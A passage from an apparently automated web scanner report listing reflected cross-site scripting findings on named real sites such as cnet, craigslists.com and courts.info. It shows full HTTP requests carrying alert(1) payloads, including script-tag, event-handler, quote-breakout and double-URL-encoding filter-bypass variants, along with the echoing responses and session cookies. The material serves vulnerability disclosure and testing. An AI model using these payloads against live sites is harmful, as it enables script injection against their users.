Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:37:33 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:37:33 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1e9cb9<a>a068ebd640a&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='109' PTYPE='8300' NCAT='17939:' CID
...[SNIP]...

6.48. http://mads.cnet.com/mac-ad [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e8c85<a>b09e8ba8b09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1&e8c85<a>b09e8ba8b09=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:43:15 GMT
Server: Apache/2.2
Content-Length: 608
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:43:15 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1&e8c85<a>b09e8ba8b09=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='109' PTYPE='8300' NCAT='17939:' CID='2' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw22.
...[SNIP]...

6.49. http://mads.cnet.com/mac-ad [x-cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the x-cb request parameter is copied into the HTML document as plain text between tags. The payload 10a82<a>eee095b3248 was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=238253110a82<a>eee095b3248&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:39:09 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:39:09 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=238253110a82<a>eee095b3248&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='109' PTYPE='8300' NCAT='17939:' CID='2' TO BEACON TEXT) *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLi
...[SNIP]...

6.50. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9894e'%3balert(1)//359739c617e was submitted in the admeld_callback parameter. This input was echoed as 9894e';alert(1)//359739c617e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match9894e'%3balert(1)//359739c617e HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuG4d4BVgEliy4Vfb1kUmDTmvAHSBkwWPSA+lwzHlc8sAowS68GyjBqvQbQBowWYzyXC8QooyyTxbNEPoCyDBoMBgwUDUHTFfFagnsl9p1FEd95nBorOmr8WIQoACHMrEg=="; io_freq_p1="eJzjEudY7yrAJLHlwq+3LAoMGgwGTBY9IDaXNMfxQAFmifVgCUaN1yDagNECzOcS5tgWKsAoMbnvNFQXgwUDUHCvC1Bw1vy1CEEAW5EfCA=="; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; segments_p1="eJzjYuZYEMzFzHE0h4uF42A3I5DZGAEkzuUAidMgwR27QIL/woHEdGMgf84PJiD57gAzkOzsYAYKT1QBMueChV/sZuZi4uDg4uLYuY9Z4NDBZe9YgAo2FgOl1n9gBJJPLoDIk2DFb3eDzDh0BMS+8B1EzgSLN/8HkU1AEmgvB5DY7wfkX9wLEl27nxEAzYguzQ=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Wed, 04 May 2011 01:29:12 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Wed, 04-May-2011 01:28:52 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 472

document.write('<img width="0" height="0" src="http://tag.admeld.com/match9894e';alert(1)//359739c617e?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1304904552&custom_user_segments=%2C11265%2C49026%2C49027%2C8%2C50185%2C4625%2C6551%2C48153%2C48156%2C48157%2C1
...[SNIP]...

6.51. http://tracking.moon-ray.com/track.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tracking.moon-ray.com
Path:   /track.php

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d5b1'%3balert(1)//b30dfeb8c85 was submitted in the t parameter. This input was echoed as 2d5b1';alert(1)//b30dfeb8c85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/&s=ysv9sd684163c3y&l=www.theamericanmonk.com/&ti=The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com&r=1&t=mr_72d5b1'%3balert(1)//b30dfeb8c85&vid=206617815 HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_=ysv9sd684163c3y; mr_src=mr_7

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 01:00:15 GMT
Connection: Keep-Alive
Set-Cookie: mr_src=mr_72d5b1%27%3Balert%281%29%2F%2Fb30dfeb8c85; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 274

_mrd.cookie='ref_=mr_72d5b1';alert(1)//b30dfeb8c85;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206617990;' + _mr_ex + ';' + 'path=/';_mrd.cookie = 't_=mr_72d5b1';alert(1)//b30dfeb8c85;' + _mr_ex + ';'+'path=/';var _mrTrackLinks = new Array;

           
...[SNIP]...

6.52. http://www.autism-society.org/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.autism-society.org
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56694"><img%20src%3da%20onerror%3dalert(1)>365080bc2dc was submitted in the REST URL parameter 1. This input was echoed as 56694"><img src=a onerror=alert(1)>365080bc2dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.ico56694"><img%20src%3da%20onerror%3dalert(1)>365080bc2dc HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autism-society.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Resin/3.1.8
Set-Cookie: JSESSIONID=abcsge3bjBjolcVVbU4_s; path=/
Content-Type: text/html; charset=UTF-8
Date: Wed, 04 May 2011 01:56:04 GMT
Set-Cookie: NSC_dnt_900_qvc=ffffffff09041e0e45525d5f4f58455e445a4a4214f4;expires=Wed, 04-May-2011 02:56:04 GMT;path=/;httponly
Content-Length: 21190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta n
...[SNIP]...
<a href="http://support.autism-society.org/site/UserLogin?NEXTURL=http://www.autism-society.org/favicon.ico56694"><img src=a onerror=alert(1)>365080bc2dc">
...[SNIP]...

6.53. http://www.bestbedguide.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bestbedguide.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload cbdde%20style%3dx%3aexpression(alert(1))%2010f88a203a9 was submitted in the REST URL parameter 1. This input was echoed as cbdde style=x:expression(alert(1)) 10f88a203a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /favicon.icocbdde%20style%3dx%3aexpression(alert(1))%2010f88a203a9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bestbedguide.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Server: nginx
Date: Wed, 04 May 2011 01:35:14 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Cookie
X-Frame-Options: DENY
Set-Cookie: sessionid=9850d59b0062c1181e3fc4cdf0a2b731; Path=/
Content-Length: 21124

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>

Error 404 - Not Found
- Best Bed Guide

</title><meta name="Description"
content="

Everything you n
...[SNIP]...
<input type="hidden" name="return" value=/favicon.icocbdde style=x:expression(alert(1)) 10f88a203a9>
...[SNIP]...

6.54. http://www.courts.info/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courts.info
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2e519<script>alert(1)</script>6cdda82d440 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico2e519<script>alert(1)</script>6cdda82d440 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.courts.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 OK
Date: Tue, 03 May 2011 20:49:11 GMT
Expires: Tue, 03 May 2011 20:49:11 GMT
Content-Length: 727
Content-Type: text/html

<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>404 Not Found</H1>
<P>
<STRONG>User:</strong> 173.193.214.243 : 51275<BR>
<STRONG>Domn:</strong> WWW.COURTS.INFO<BR>
<STRONG>Host:</s
...[SNIP]...
</strong> /FAVICON.ICO2E519<SCRIPT>ALERT(1)</SCRIPT>6CDDA82D440<BR>
...[SNIP]...

6.55. http://www.courts.info/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courts.info
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload edd1e<script>alert(1)</script>b3925b2fc14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?edd1e<script>alert(1)</script>b3925b2fc14=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.courts.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 OK
Date: Tue, 03 May 2011 20:49:03 GMT
Expires: Tue, 03 May 2011 20:49:03 GMT
Content-Length: 726
Content-Type: text/html

<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>404 Not Found</H1>
<P>
<STRONG>User:</strong> 173.193.214.243 : 50741<BR>
<STRONG>Domn:</strong> WWW.COURTS.INFO<BR>
<STRONG>Host:</s
...[SNIP]...
</strong> EDD1E<SCRIPT>ALERT(1)</SCRIPT>B3925B2FC14 = 1<BR>
...[SNIP]...

6.56. http://www.craigslists.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craigslists.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d154%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef76299b78f6 was submitted in the REST URL parameter 1. This input was echoed as 6d154"><script>alert(1)</script>f76299b78f6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /6d154%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef76299b78f6 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslists.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:09:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash03
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 575

<html><head>

<title></title></head>
<!-- Redirection Services ASH01WRED03 H1 -->
<frameset rows='100%, *' frameborder=no framespacing=0 border=0>
<frame src="http://craigsolomon.net/6d154"><script>alert(1)</script>f76299b78f6" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0>
...[SNIP]...

6.57. http://www.craigslists.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craigslists.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff2e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f51871d241 was submitted in the REST URL parameter 1. This input was echoed as 5ff2e"><script>alert(1)</script>6f51871d241 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico5ff2e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6f51871d241 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslists.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:09:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash08
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 597

<html><head>

<title></title></head>
<!-- Redirection Services ASH01WRED08 H1 -->
<frameset rows='100%, *' frameborder=no framespacing=0 border=0>
<frame src="http://craigsolomon.net/favicon.ico5ff2e"
...[SNIP]...
<a href="http://craigsolomon.net/favicon.ico5ff2e"><script>alert(1)</script>6f51871d241">
...[SNIP]...

6.58. http://www.craigslists.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craigslists.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5642"><script>alert(1)</script>bc1710a9759 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?f5642"><script>alert(1)</script>bc1710a9759=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslists.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:09:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash07
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 603

<html><head>

<title></title></head>
<!-- Redirection Services ASH01WRED07 H1 -->
<frameset rows='100%, *' frameborder=no framespacing=0 border=0>
<frame src="http://craigsolomon.net/favicon.ico?f5642"><script>alert(1)</script>bc1710a9759=1" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0>
...[SNIP]...

6.59. http://www.craigslists.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.craigslists.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60ae7"><script>alert(1)</script>3982eb966d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?60ae7"><script>alert(1)</script>3982eb966d3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.craigslists.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:09:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
x-server: ash08
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 603

<html><head>

<title></title></head>
<!-- Redirection Services ASH01WRED08 H1 -->
<frameset rows='100%, *' frameborder=no framespacing=0 border=0>
<frame src="http://craigsolomon.net/favicon.ico?60ae7
...[SNIP]...
<a href="http://craigsolomon.net/favicon.ico?60ae7"><script>alert(1)</script>3982eb966d3=1">
...[SNIP]...

6.60. http://www.electroluxappliances.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.electroluxappliances.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a35b'-alert(1)-'7fea7187e48 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /3a35b'-alert(1)-'7fea7187e48 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.electroluxappliances.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 16246
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Wed, 04 May 2011 03:08:10 GMT
Date: Wed, 04 May 2011 03:08:10 GMT
Connection: close
